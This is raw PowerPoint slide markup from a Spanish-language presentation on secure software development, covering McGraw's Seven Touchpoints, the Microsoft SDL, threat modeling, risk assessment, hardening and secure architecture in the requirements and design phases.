                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>McGraw’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Seven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Touchpoints</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Software Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Conector recto 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{359FB59D-04C6-5AD6-DD88-549405CD91D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5271753" y="1402149"/>
            <a:ext cx="0" cy="31341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19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C05B37B-6170-2736-0DD0-EF92277B9733}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2637129" y="5035906"/>
            <a:ext cx="5883267" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx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Referencias</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>McGraw, Gary. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Software Security. Building Security In</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Microsoft Security Development Lifecycle (SDL)</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="3 Marcador de texto">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D229EB3-C7B9-F720-1FB5-44269AB44229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5456264" y="1312927"/>
            <a:ext cx="6023067" cy="565635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Microsoft Security Development Lifecycle (SDL)</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59EDF8A6-2A0C-F569-BC92-42FCE23EB15B}"/>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90180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C5844-214F-5406-B4C5-A00A795DD1D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A127078F-3B92-B430-721C-471549B5D90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1ABA219-1AF1-0B34-0B9A-6AD329C7931E}"/>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057286DF-A0D6-E60F-4FE7-F120DAA46A1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DF42D092-A517-F6CB-4841-5CBC6021A9DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952615" y="2161377"/>
            <a:ext cx="9505794" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectángulo 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4945EE3-58C4-E6F6-9293-B6FFE1FE40AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733591" y="2530709"/>
            <a:ext cx="3717389" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Fase de Análisis de requisitos</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Diagrama 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AD00561-2F8D-6A57-24EE-0E16A3EEF4EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3946555127"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="723711" y="1407825"/>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Rectángulo 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E47B7093-5724-1F3F-C77E-8CABD83776D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4493698" y="3148581"/>
            <a:ext cx="3158771" cy="23712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Identificación de requisitos de seguridad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Identificar y documentar los requisitos de seguridad del proyecto.</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14" name="Rectángulo 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E56E6042-C537-51B6-669D-C5E45ED00959}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7834326" y="3165340"/>
            <a:ext cx="3158771" cy="2395380"/>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Evaluación de riesgos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="es-ES" sz="1800" b="1"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Evaluación de riesgos temprana para identificar posibles amenazas y vulnerabilidades.</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800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectángulo 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47D3C5C1-D452-3AB1-DCC9-74ED960DE204}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4478309" y="4933137"/>
            <a:ext cx="3174160" cy="958210"/>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Autenticación, autorización, cifrado, manejo de datos sensibles, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectángulo 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69AA2EB9-59EB-33F7-8E38-011439F092CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1153070" y="3148581"/>
            <a:ext cx="3158771" cy="23712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Análisis de requisitos y diseño</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600"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Obtener los requisitos necesarios a implementar para el correcto funcionamiento.</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17" name="Rectángulo 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3DA3B51-F602-6A34-CCF1-1F42777DF664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1153070" y="4933137"/>
            <a:ext cx="3174160" cy="958210"/>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Objetivos, tecnologías, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, lenguajes, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectángulo 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41C0A742-37B2-D5A6-D51E-8D27BD502710}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7834326" y="4933137"/>
            <a:ext cx="3174160" cy="958210"/>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Contexto, posibles amenazas del uso de las tecnologías, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> o lenguajes, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Imagen 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{110FEB5E-7E60-99A4-E2A8-28AC8E1D7C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2701" y="2190933"/>
            <a:ext cx="871537" cy="871537"/>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41858A21-79B8-6E06-71FC-4707C24D1D80}"/>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182296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67146-B313-17C7-DB3B-18082CC806D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9360F8D1-F2F1-8D8C-8937-15C95DF98E6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C00C1D1-B7BC-CFE0-C8EF-94B0D365FF0A}"/>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CE826D00-A52F-D1D1-F4F2-318D77282718}"/>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5" name="Rectángulo 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14F2899E-4158-35C9-36D2-5FA79BC196F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3615077" y="2527187"/>
            <a:ext cx="2277226" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Fase de Diseño</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="26" name="Diagrama 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F62EC35C-4334-51E5-ED10-82454347B7DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1523869958"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="533556" y="1248686"/>
          <a:ext cx="9436901" cy="1065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Rectángulo 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBC9A583-E114-9810-FBE1-D0B980CEE2F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4159742" y="3155242"/>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Modelado de amenazas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Identificar las amenazas y riesgos en el diseño para establecer las mitigaciones adecuadas.</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28" name="Rectángulo 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D95087E3-7AA3-0239-3F11-CDC8320DC681}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7500370" y="3172000"/>
            <a:ext cx="3158771" cy="249366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Bastionado</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="es-ES" sz="1800" b="1"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Determinar la configuración segura.</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800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectángulo 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F377CA2C-A02F-B940-5A7B-87051EAE3EFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4144353" y="4939798"/>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latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Análisis de arquitectura, diagramas de contexto, diagramas de flujo de datos, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectángulo 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D98EA575-245F-0905-6729-7865026764D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819114" y="3155242"/>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Arquitectura segura</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="es-ES" sz="1800" b="1"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Diseño de una arquitectura segura que incluya mecanismos de seguridad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </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31" name="Rectángulo 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA07CB34-7215-EDA8-7DDD-1568C9AF7A45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819114" y="4939798"/>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latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Firewalls, sistemas de autenticación y autorización, comunicaciones seguras, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectángulo 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03BF153F-2A61-03CB-E080-C762E13029A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
